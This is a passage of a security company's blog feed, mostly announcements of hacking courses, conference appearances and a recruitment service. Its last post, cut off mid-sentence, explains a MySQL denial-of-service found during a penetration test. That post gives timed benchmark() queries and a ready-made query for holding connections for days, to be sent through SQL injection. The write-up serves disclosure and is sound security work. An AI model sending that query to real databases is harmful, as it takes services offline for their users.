/&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;b&gt;Congratulations to Edith Ngoetjana&lt;/b&gt; from FNB for winning the draw for the Playstation 3, Enjoy it! I wouldn’t recommended joining the PSN though ;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;Congratulations to  Simphiwe Mayisela&lt;/b&gt; from T-Systems for winning the Web Application Hacking 101 training, valued at R7490.00 ex Vat&lt;span style="color:#1F497D"&gt;.&lt;/span&gt; We hope that you find it to be very rewarding.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5573893062150400584?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5573893062150400584/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5573893062150400584' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5573893062150400584'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5573893062150400584'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/05/telspace-represents-at-itweb-security.html' title='Telspace represents at the ITWeb Security Summit 2011'/><author><name>shaun@telspace.co.za</name><uri>http://www.blogger.com/profile/10278863305410927504</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-LzI48LsV8iQ/TdohdBgn6WI/AAAAAAAAAAc/-ujjfr9XtgI/s72-c/Summit%2BStand.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6473038554770081945</id><published>2011-05-08T21:39:00.001+02:00</published><updated>2011-05-08T21:43:10.687+02:00</updated><title type='text'>Telspace Systems' new recruitment division addresses IT security skills scarcity</title><content type='html'>Telspace Systems, a leading IT security solutions provider for both local and international markets, is expanding its services to include a security-focused skills recruitment division.&lt;br /&gt;&lt;br /&gt;The company has identified a growing shortage of specialised and highly-skilled individuals in the market, which is having a negative effect on local companies' level of security.&lt;br /&gt;&lt;br /&gt;Says Dino Covotsos, CEO of Telspace Systems: “The apparent lack of available security skills is becoming a growing concern for businesses. As cyber threats increase in sophistication, so should the systems that protect companies against them. We are seeing more and more that there are simply not enough highly-skilled individuals to ensure that these critical systems offer adequate protection.”&lt;br /&gt;&lt;br /&gt;Telspace Systems' new division aims to provide companies with candidates that can effectively address business security concerns based on skill level, experience and knowledge. “Limited skills often mean limited protection, and businesses need to understand the risks they face if they do not implement adequate protection,” says Covotsos.&lt;br /&gt;&lt;br /&gt;Telspace Systems will be at the ITWeb Security Summit 2011 on 10-11 May at the Sandton Convention Centre, where it will highlight its new division to delegates. Visitors will have a chance to interact with the team and learn more about the types of skills, the industry needs and what is currently available.&lt;br /&gt;&lt;br /&gt;This turnkey operation is the first of its kind, and given the company's industry knowledge, research and experience, it will be able to provide top talent and opportunities to many organisations and skilled security candidates respectively.&lt;br /&gt;“We are very excited about our new service offering and that we are able to bolster the level and quality of security for companies,” Covotsos concludes.&lt;br /&gt;&lt;br /&gt;Going forward, the company has plans to expand its IT security recruitment service internationally, and depending on market indications, begin offering other much-needed specialised IT skills as well.&lt;br /&gt;&lt;br /&gt;For any enquiries, please feel free to contact Telspace Systems' Recruitment Director Shaun Levy at (011) 875 4319 or email shaun[at]telspace.co.za&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6473038554770081945?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6473038554770081945/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6473038554770081945' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6473038554770081945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6473038554770081945'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/05/telspace-systems-new-recruitment.html' title='Telspace Systems&apos; new recruitment division addresses IT security skills scarcity'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4743852515801725871</id><published>2011-04-08T00:32:00.004+02:00</published><updated>2011-04-08T00:38:54.431+02:00</updated><title type='text'>Web Application Hacking 101</title><content type='html'>Telspace Systems presents our Web Application Hacking 101 course during June 2011. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.telspace.co.za/hacking%20web%20applications.html"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-TT0ZPvVZczo/TZ47mgheDzI/AAAAAAAAADY/IE56zW0lzRc/s1600/emailer1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 198px; height: 320px;" src="http://1.bp.blogspot.com/-TT0ZPvVZczo/TZ47mgheDzI/AAAAAAAAADY/IE56zW0lzRc/s320/emailer1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5592973319992119090" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Click &lt;a href="http://www.telspace.co.za/hacking%20web%20applications.html"&gt;here&lt;/a&gt; for more information.&lt;br /&gt;&lt;br /&gt;This course is aimed at developers, IT security staff, technology enthusiasts and web application specialists. Book multiple students and you will automatically qualify for a discount! We look forward to seeing you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4743852515801725871?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4743852515801725871/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4743852515801725871' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4743852515801725871'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4743852515801725871'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/04/web-application-hacking-101.html' title='Web Application Hacking 101'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-TT0ZPvVZczo/TZ47mgheDzI/AAAAAAAAADY/IE56zW0lzRc/s72-c/emailer1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-8126576470453707161</id><published>2011-04-05T00:31:00.004+02:00</published><updated>2011-04-05T00:36:03.638+02:00</updated><title type='text'>Takedowncon USA</title><content type='html'>It is with great pleasure that Telspace Systems presents training at the internationally recognised TakeDownCon, to be held in Dallas, USA.&lt;br /&gt;&lt;br /&gt;Telspace Systems will be holding a 2 day training session during May 2011.&lt;br /&gt;&lt;br /&gt;More information can be found at:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.takedowncon.com/?page_id=753"&gt;http://www.takedowncon.com/?page_id=753&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-7KcluyS_62k/TZpHiovFjNI/AAAAAAAAADQ/TXtv9CxIWvk/s1600/takedowncon1.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 74px;" src="http://4.bp.blogspot.com/-7KcluyS_62k/TZpHiovFjNI/AAAAAAAAADQ/TXtv9CxIWvk/s320/takedowncon1.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5591860547709930706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In addition, if you sign up now you can get a FREE IPAD for attending our training session.&lt;br /&gt;&lt;br /&gt;We hope to see you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-8126576470453707161?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/8126576470453707161/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=8126576470453707161' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8126576470453707161'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8126576470453707161'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/04/takedowncon-usa.html' title='Takedowncon USA'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-7KcluyS_62k/TZpHiovFjNI/AAAAAAAAADQ/TXtv9CxIWvk/s72-c/takedowncon1.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-9133682284427919350</id><published>2011-03-23T13:00:00.004+02:00</published><updated>2011-03-23T13:07:13.507+02:00</updated><title type='text'>Training Feedback</title><content type='html'>Telspace Systems successfully completed another training session last week at the FNB training centre in Sandton, Johannesburg.&lt;br /&gt;&lt;br /&gt;We would like to thank all the candidates for coming through and working hard to get through the 2 day course, I trust you all found it very valuable.&lt;br /&gt;&lt;br /&gt;Please find the public feedback for our course as per below, the course was very well received by all candidates.&lt;br /&gt;&lt;br /&gt;Breakdown of Candidate responses:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-sJFFZH1Q3t8/TYnTUZJ8nAI/AAAAAAAAADA/hK9kjQL3MFo/s1600/Training%2BFeedback%2B1.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 290px;" src="http://1.bp.blogspot.com/-sJFFZH1Q3t8/TYnTUZJ8nAI/AAAAAAAAADA/hK9kjQL3MFo/s320/Training%2BFeedback%2B1.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5587229160033262594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Overall Training Feedback:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-IZmy1V3m2ns/TYnTaZdpTmI/AAAAAAAAADI/YYPfpuAjBjY/s1600/Training%2BFeedback%2B2.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://2.bp.blogspot.com/-IZmy1V3m2ns/TYnTaZdpTmI/AAAAAAAAADI/YYPfpuAjBjY/s320/Training%2BFeedback%2B2.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5587229263195098722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We look forward to presenting this course again during June 2011. &lt;br /&gt;&lt;br /&gt;See you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-9133682284427919350?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/9133682284427919350/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=9133682284427919350' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/9133682284427919350'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/9133682284427919350'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/03/training-feedback.html' title='Training Feedback'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-sJFFZH1Q3t8/TYnTUZJ8nAI/AAAAAAAAADA/hK9kjQL3MFo/s72-c/Training%2BFeedback%2B1.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6004356491187668908</id><published>2011-01-31T21:52:00.005+02:00</published><updated>2011-01-31T22:04:47.691+02:00</updated><title type='text'>Telspace Sponsors ITWeb Security Summit 2011</title><content type='html'>Telspace Systems is proud to announce that for a second year running, we will be a sponsor of the ITWeb Security Summit 2011.&lt;br /&gt;&lt;br /&gt;This conference will be held in Johannesburg, South Africa. This event is undoubtedly the largest security conference in South Africa and is attended by most major companies and government departments in the country.&lt;br /&gt;&lt;br /&gt;Get more information about the sponsors &lt;a href="http://www.itweb.co.za/index.php?option=com_content&amp;view=article&amp;id=38565&amp;Itemid=2330"&gt;here&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;You can get more information about the security summit &lt;a href="http://www.itweb.co.za/index.php?option=com_content&amp;view=article&amp;id=38100&amp;Itemid=2330"&gt;here&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;We hope to see you all there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6004356491187668908?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6004356491187668908/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6004356491187668908' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6004356491187668908'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6004356491187668908'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/01/telspace-sponsors-itweb-security-summit.html' title='Telspace Sponsors ITWeb Security Summit 2011'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3443640285943407559</id><published>2011-01-12T12:49:00.003+02:00</published><updated>2011-01-12T12:56:01.788+02:00</updated><title type='text'>Wireless and Bluetooth Hacking 101 - March 2011</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_4Wfys5NtIhA/TS2HcB4DZ9I/AAAAAAAAAC0/4Z8FEqWyRi8/s1600/bluetooth%2Band%2Bwireless%2Bhacking%2B101%2B-%2BMarch%2B2010.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://3.bp.blogspot.com/_4Wfys5NtIhA/TS2HcB4DZ9I/AAAAAAAAAC0/4Z8FEqWyRi8/s320/bluetooth%2Band%2Bwireless%2Bhacking%2B101%2B-%2BMarch%2B2010.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5561250030482057170" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course during March 2011!&lt;br /&gt; &lt;br /&gt;We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed! If you are a ISG member in South Africa, you will also qualify for a further 10% discount.&lt;br /&gt; &lt;br /&gt;Venue: The FNB Conference Centre – Sandton&lt;br /&gt;Costs: R7490.00 excluding VAT per person&lt;br /&gt;Dates: 16th &amp; 17th March 2011&lt;br /&gt; &lt;br /&gt;Please see course details above or visit our website for more info: &lt;a href="http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html"&gt;http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;Email us at info@telspace.co.za for bookings.&lt;br /&gt;&lt;br /&gt;Looking forward to seeing you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3443640285943407559?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3443640285943407559/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3443640285943407559' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3443640285943407559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3443640285943407559'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/01/wireless-and-bluetooth-hacking-101.html' title='Wireless and Bluetooth Hacking 101 - March 2011'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_4Wfys5NtIhA/TS2HcB4DZ9I/AAAAAAAAAC0/4Z8FEqWyRi8/s72-c/bluetooth%2Band%2Bwireless%2Bhacking%2B101%2B-%2BMarch%2B2010.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1950799405680828527</id><published>2010-12-14T12:40:00.000+02:00</published><updated>2010-12-14T12:41:23.863+02:00</updated><title type='text'>Happy Holidays!</title><content type='html'>To all our Valued Clients and Friends,&lt;br /&gt;&lt;br /&gt;The holiday season is a wonderful time for us to remember the friends and customers who help our business and make our jobs a pleasure all year long. Our business would not be where it is today without your continued and loyal support.&lt;br /&gt;&lt;br /&gt;We'd like to take this opportunity to thank you and send our best wishes to you and your families. May your New Year be filled with all the success and happiness that you deserve.&lt;br /&gt;&lt;br /&gt;This year has been an extremely busy year for us. Reflecting back on some of the highlights of the year shows us that we have been very fortunate to have spoken and trained at several well respected conferences including Hack in the Box Dubai 2010, IIR in Rosebank and ISSA in Sandton. We were also fortunate enough to have been a sponsor of the ITweb Security Summit 2010.&lt;br /&gt;&lt;br /&gt;In terms of giving back to the underprivileged, Telspace Systems got involved in Johnny Long’s Hackers for Charity, Nadia Van Der Merwe (FHM) Charity event in association with Lory Park Zoo and our entire Telspace Systems team helped needy children with the Santa's Shoebox Christmas charity drive – where we provided underprivileged children with the basic necessities and Christmas presents. &lt;br /&gt;&lt;br /&gt;From all of us at Telspace Systems, thank you for your loyal support, may you have a safe and restful holiday season.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1950799405680828527?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1950799405680828527/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1950799405680828527' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1950799405680828527'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1950799405680828527'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/12/happy-holidays.html' title='Happy Holidays!'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3791405146337202514</id><published>2010-11-12T13:49:00.004+02:00</published><updated>2010-11-12T14:08:28.813+02:00</updated><title type='text'>IIR Conference</title><content type='html'>&lt;pre wrap=""&gt;The International Institute of Research's (IIR) IT Risk Management Conference was held this week in Rosebank on the 10,11 &amp;amp; 12th November 2010.&lt;br /&gt;&lt;br /&gt;Telspace Systems was invited to present their popular "Next Generation BotNet" talk which was very well received. Telspace is honoured for the opportunity to have spoken at the IIR conference and is looking forward to the next IT Risk Management Conference.&lt;br /&gt;&lt;br /&gt;The "Next Generation BotNet" is available for download on our site. &lt;a href="http://www.telspace.co.za/BotnetsODP-Final%20-%20Version%202.0.pdf"&gt;http://www.telspace.co.za&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Telspace will also be running the highly recommended Bluetooth &amp;amp; Wireless Hacking Course at the end of November. For more information or any queries please email info@telspace.co.za&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3791405146337202514?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3791405146337202514/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3791405146337202514' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3791405146337202514'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3791405146337202514'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/11/iir-conference.html' title='IIR Conference'/><author><name>Andries</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5456258366019827684</id><published>2010-11-10T14:16:00.004+02:00</published><updated>2010-11-10T14:18:48.106+02:00</updated><title type='text'>Bluetooth and Wireless Hacking 101</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_4Wfys5NtIhA/TNqNUZGcNAI/AAAAAAAAACo/A21eaz0tsE8/s1600/bluetooth%2Band%2Bwireless%2Bhacking%2B101.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://2.bp.blogspot.com/_4Wfys5NtIhA/TNqNUZGcNAI/AAAAAAAAACo/A21eaz0tsE8/s320/bluetooth%2Band%2Bwireless%2Bhacking%2B101.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5537894073280246786" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course at the end of November this year!&lt;br /&gt; &lt;br /&gt;We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed!&lt;br /&gt; &lt;br /&gt;Venue: The FNB Conference Centre – Sandton&lt;br /&gt;Costs: R7490.00 excluding VAT per person&lt;br /&gt;Dates: 25-26th November 2010&lt;br /&gt; &lt;br /&gt;Please see course details above or visit our website for more info: &lt;a href="http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html"&gt;http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;Looking forward to seeing you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5456258366019827684?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5456258366019827684/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5456258366019827684' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5456258366019827684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5456258366019827684'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/11/bluetooth-and-wireless-hacking-101.html' title='Bluetooth and Wireless Hacking 101'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_4Wfys5NtIhA/TNqNUZGcNAI/AAAAAAAAACo/A21eaz0tsE8/s72-c/bluetooth%2Band%2Bwireless%2Bhacking%2B101.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6177797847404154897</id><published>2010-09-30T09:57:00.002+02:00</published><updated>2010-09-30T10:07:27.625+02:00</updated><title type='text'>MySQL query timeout remote Denial of Service</title><content type='html'>Tiago Ferreira, a senior security analyst at Telspace Systems, recently stumbled on a vulnerability in Mysql during a Penetration test for a client.&lt;br /&gt;&lt;br /&gt;Due to the lack of execution limit time (query timeout) for queries, it is possible to force the MySQL to process a certain query for a determined amount of time (hours/days). The processing time will depend on the hardware resources (cpu, memory) available at the server.&lt;br /&gt;&lt;br /&gt;The MySQL has a system variable that defines the maximum amount of connections that can be made simultaneously (max_user_connections) for the daemon. For instance, if this variable is configured to “max_user_connections=100, the MySQL will just allow that 100 simultaneous connections be processed. If a "101" connection is attempted, the daemon will answer with the message *Too many connections*, so that no other requirement be processed while the connections are active.&lt;br /&gt;&lt;br /&gt;The benchmark() function can be used to "hold" a determined connection for a certain time interval. For instance:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  mysql&gt; select benchmark(500000,sha1('A'));&lt;br /&gt;  +------------------------------+&lt;br /&gt;  | benchmark(500000,sha1(0x65)) |&lt;br /&gt;  +------------------------------+&lt;br /&gt;  |                            0 | &lt;br /&gt;  +------------------------------+&lt;br /&gt;  1 row in set (1.11 sec)&lt;br /&gt;&lt;br /&gt;When running the benchmark() function, as illustrated, it is possible to verify that the MySQL took about 1.11 seconds to process the query, which means it "held" the connection for a period of 1.11 seconds.&lt;br /&gt;&lt;br /&gt;If the value referring to the number of processing times of the benchmark() function is increased, the total processing time will, therefore, increase.&lt;br /&gt;&lt;br /&gt; mysql&gt; select benchmark(500000000,sha1(0x65));&lt;br /&gt; +---------------------------------+&lt;br /&gt; | benchmark(500000000,sha1(0x65)) |&lt;br /&gt; +---------------------------------+&lt;br /&gt; |                             0 | &lt;br /&gt; +---------------------------------+&lt;br /&gt; 1 row in set (12 min 5.06 sec)&lt;br /&gt;&lt;br /&gt;The processing of the benchmark() function above took 12 minutes to be executed. &lt;br /&gt;&lt;br /&gt;As this function does not have limits for the amount of times necessary to process certain task, it is possible to increase this number to an extremely high value, so that one or more available connections be occupied for a long period of time.&lt;br /&gt;&lt;br /&gt;To cause a denial of service, multiple simultaneous connection queries are sent, to fill all the available slots in the MySQL(defined in max_user_connections) and maintain these connections busy with the benchmark() processing. This way the following connections will not be processed by the daemon. &lt;br /&gt;&lt;br /&gt;To force the MySQL into processing a query for a lot of hours/days, the following query can be sent:  &lt;br /&gt;&lt;br /&gt;  select benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))&lt;br /&gt; &lt;br /&gt;The native function ENCODE() takes about 4 times more to be processed than the sha1() function, and soon was chosen to "hold" the MySQL connections. During the tests made with the daemon, it was noticed that the cpu processing was kept at an average 98%, also denying new connections to the data base. To establish the normal functioning of the daemon it was necessary to restart the MySQL. &lt;br /&gt;&lt;br /&gt;The same kind of tests were made in the Microsoft SQL Server 2005, using the function *waitfor delay*, but it didn't appear to be vulnerable because the error message "Query timeout expired" was shown and the connection allowed, which means the MSSQL has a query time checking native algorithm.&lt;br /&gt;&lt;br /&gt;The impact caused by the exploration of this vulnerability is more critical when done remotely against Web applications vulnerable to a SQL Injection or Blind SQL Injection. &lt;br /&gt;&lt;br /&gt;For instance, an e-commerce site using the MySQL to 